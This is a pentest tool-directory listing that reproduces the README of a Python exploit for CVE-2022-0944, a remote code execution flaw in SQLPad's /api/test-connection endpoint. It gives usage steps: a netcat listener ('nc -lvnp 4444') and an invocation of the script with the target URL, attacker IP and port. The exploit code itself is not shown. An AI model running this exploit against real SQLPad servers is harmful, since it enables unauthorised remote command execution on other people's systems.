Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
sqlpad-rce-exploit-CVE-2022-0944 — Python exploit for CVE-2022-0944 enabling blind remote code execution in SQLPad through the /api/test-connection endpoint with netcat callback. | Kitploit
Tools/GitHubGitHub/0xroqeeb/sqlpad-rce-exploit-cve-2022-0944
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHub0xroqeeb/sqlpad-rce-exploit-cve-2022-0944

sqlpad-rce-exploit-CVE-2022-0944

Python exploit for CVE-2022-0944 enabling blind remote code execution in SQLPad through the /api/test-connection endpoint with netcat callback.

View Repository
92121 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

SQLPad RCE Exploit

This repository contains an exploit script for CVE-2022-0944 in SQLPad, a vulnerability that allows for Remote Code Execution (RCE) via the /api/test-connection endpoint.

Overview

The provided script (exploit.py) demonstrates how to exploit the RCE vulnerability in SQLPad. The script sends a payload to the vulnerable endpoint, executing a command on the target server.

Features

  • Blind RCE: Executes commands on the target server without receiving direct responses.
  • Netcat Listener: Requires a netcat listener setup on the attacker's machine to receive outputs.

Prerequisites

  • Python 3.x
  • requests library (can be installed via pip)

Usage

  1. Setup a Netcat Listener
root@kitploit:~
nc -lvnp 4444

Run the Exploit

root@kitploit:~
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>

Affected Versions

  • Up to (excluding) 6.10.1

References

  • Huntr - CVE-2022-0944
  • NVD - CVE-2022-0944
Download Tool